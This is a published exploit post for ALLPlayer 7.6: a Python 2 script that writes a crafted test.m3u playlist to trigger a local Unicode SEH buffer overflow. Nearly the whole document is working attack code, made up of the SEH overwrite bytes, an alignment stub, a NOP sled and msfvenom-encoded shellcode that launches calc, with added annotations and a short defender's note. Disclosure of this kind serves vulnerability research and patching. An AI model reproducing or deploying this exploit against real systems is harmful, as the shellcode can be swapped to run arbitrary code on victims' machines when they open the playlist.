
ALLPlayer 7.6 Buffer Overflow

ALLPlayer 7.6 Buffer Overflow
Posted Apr 20, 2020
Authored by Xenofon Vassilakopoulos

ALLPlayer version 7.6 unicode SEH local buffer overflow exploit.

tags | exploit, overflow, local
MD5 | d4dd6ec9d182e4cc7cce633147a8a316



# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)
# Version: 7.6
# Date: 20-04-2020
# Exploit Author: Xenofon Vassilakopoulos
# Tested on: Windows 7 Home Premium SP1 x86

# Steps to reproduce:
# 1. generate the test.m3u using this exploit
# 2. open ALLPlayer then go to Open audio file
# 3. load the test.m3u file
# 4. calc

# Python 2 script: the `print` statement below is a SyntaxError on Python 3,
# and on Python 3 the str + bytes concatenation in `payload` would raise
# TypeError (on Python 2, b"..." literals are plain str, so it works).
filename = "test.m3u"  # output playlist; the over-long entry is the trigger

# Filler placed before the SEH record (see the concatenation order in `payload`).
junk="A"*301

# NOTE: per the title this is a Unicode (UTF-16) overflow, so each of these
# ASCII bytes is presumably expanded to a 16-bit code unit by the target's
# string conversion; the two-byte values below stand for the 4-byte
# nSEH / SEH fields after that expansion.
nseh = "\x61\x6e" # popad align
seh = "\x12\x74" # pop ebx # pop ebp # ret 0x04


# Alignment stub; the interleaved "\x6e" bytes are Unicode-safe padding
# (author's term: venetian shellcode). Each instruction is annotated inline.
align=("\x56" # push esi
"\x6e" # venetian shellcode
"\x58" # pop eax
"\x6e" # venetian shellcode
"\x05\x19\x11" # add eax,0x11001900
"\x6e" # venetian shellcode
"\x2d\x16\x11" # sub eax,0x11001600
"\x6e" # venetian shellcode
"\x50" # push eax
"\x6e" # venetian shellcode
"\xc3" # retn
)

# 45-byte NOP sled between the alignment stub and the encoded shellcode.
nop="\x90"*45

# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python
# Opaque generator output: an alphanumeric Unicode-mixed encoded payload that
# decodes itself relative to EAX. It is reproduced verbatim and not annotated.
shellcode= b""
shellcode+= b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode+= b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode+= b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode+= b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode+= b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode+= b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode+= b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode+= b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode+= b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode+= b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x69\x58\x62\x62"
shellcode+= b"\x49\x70\x69\x70\x4d\x30\x71\x50\x63\x59\x48\x65\x6e"
shellcode+= b"\x51\x57\x50\x52\x44\x54\x4b\x32\x30\x6e\x50\x54\x4b"
shellcode+= b"\x72\x32\x6a\x6c\x54\x4b\x70\x52\x6d\x44\x72\x6b\x61"
shellcode+= b"\x62\x6f\x38\x4a\x6f\x45\x67\x4e\x6a\x6d\x56\x4d\x61"
shellcode+= b"\x69\x6f\x34\x6c\x4f\x4c\x51\x51\x53\x4c\x79\x72\x4c"
shellcode+= b"\x6c\x6d\x50\x66\x61\x58\x4f\x4c\x4d\x59\x71\x67\x57"
shellcode+= b"\x38\x62\x39\x62\x62\x32\x6e\x77\x74\x4b\x4e\x72\x4c"
shellcode+= b"\x50\x34\x4b\x50\x4a\x4f\x4c\x72\x6b\x30\x4c\x4e\x31"
shellcode+= b"\x51\x68\x38\x63\x61\x38\x79\x71\x36\x71\x70\x51\x62"
shellcode+= b"\x6b\x71\x49\x6b\x70\x69\x71\x66\x73\x54\x4b\x31\x39"
shellcode+= b"\x6c\x58\x37\x73\x6e\x5a\x6e\x69\x32\x6b\x6e\x54\x64"
shellcode+= b"\x4b\x5a\x61\x59\x46\x50\x31\x49\x6f\x74\x6c\x69\x31"
shellcode+= b"\x48\x4f\x6a\x6d\x7a\x61\x59\x37\x70\x38\x59\x50\x61"
shellcode+= b"\x65\x4a\x56\x4c\x43\x71\x6d\x4c\x38\x6d\x6b\x43\x4d"
shellcode+= b"\x4f\x34\x42\x55\x67\x74\x31\x48\x44\x4b\x32\x38\x4c"
shellcode+= b"\x64\x6b\x51\x5a\x33\x61\x56\x62\x6b\x6c\x4c\x6e\x6b"
shellcode+= b"\x44\x4b\x6f\x68\x4b\x6c\x7a\x61\x6a\x33\x64\x4b\x6b"
shellcode+= b"\x54\x52\x6b\x49\x71\x36\x70\x42\x69\x4e\x64\x6b\x74"
shellcode+= b"\x6f\x34\x6f\x6b\x61\x4b\x51\x51\x72\x39\x4f\x6a\x4f"
shellcode+= b"\x61\x59\x6f\x47\x70\x71\x4f\x4f\x6f\x4e\x7a\x32\x6b"
shellcode+= b"\x6e\x32\x4a\x4b\x52\x6d\x61\x4d\x72\x4a\x6a\x61\x32"
shellcode+= b"\x6d\x42\x65\x75\x62\x49\x70\x79\x70\x4b\x50\x62\x30"
shellcode+= b"\x52\x48\x4d\x61\x72\x6b\x42\x4f\x35\x37\x49\x6f\x4a"
shellcode+= b"\x35\x37\x4b\x6c\x30\x64\x75\x53\x72\x61\x46\x31\x58"
shellcode+= b"\x45\x56\x56\x35\x45\x6d\x33\x6d\x49\x6f\x59\x45\x4f"
shellcode+= b"\x4c\x59\x76\x73\x4c\x6a\x6a\x75\x30\x69\x6b\x47\x70"
shellcode+= b"\x30\x75\x7a\x65\x35\x6b\x4e\x67\x7a\x73\x50\x72\x52"
shellcode+= b"\x4f\x6f\x7a\x69\x70\x30\x53\x49\x6f\x6a\x35\x51\x53"
shellcode+= b"\x70\x61\x32\x4c\x6f\x73\x49\x70\x41\x41"

# Layout of the playlist entry, in order: filler, nSEH, SEH, alignment stub,
# NOP sled, encoded shellcode. Every length above is load-bearing: changing
# any of them shifts the SEH record off its expected offset.
payload=junk+nseh+seh+align+nop+shellcode

# Pad the entry to exactly 5000 bytes ("D" is arbitrary filler).
fill="D"*(5000-len(payload))

payload+=fill
f=open(filename,"wb")
# The entry is written with an "http://" prefix, so the file on disk is
# 7 bytes longer than the length reported below; len(payload) is 5000.
f.write('http://'+payload)
print "\nFile created with %d bytes" % len(payload)
# Defender's note: the observable artifact is a single playlist entry of
# ~5 KB beginning with "http://" and a long run of repeated bytes — far
# longer than any legitimate URL; presumably a bounded copy of the entry in
# the player would prevent the overflow (not verifiable from this script).
f.close()
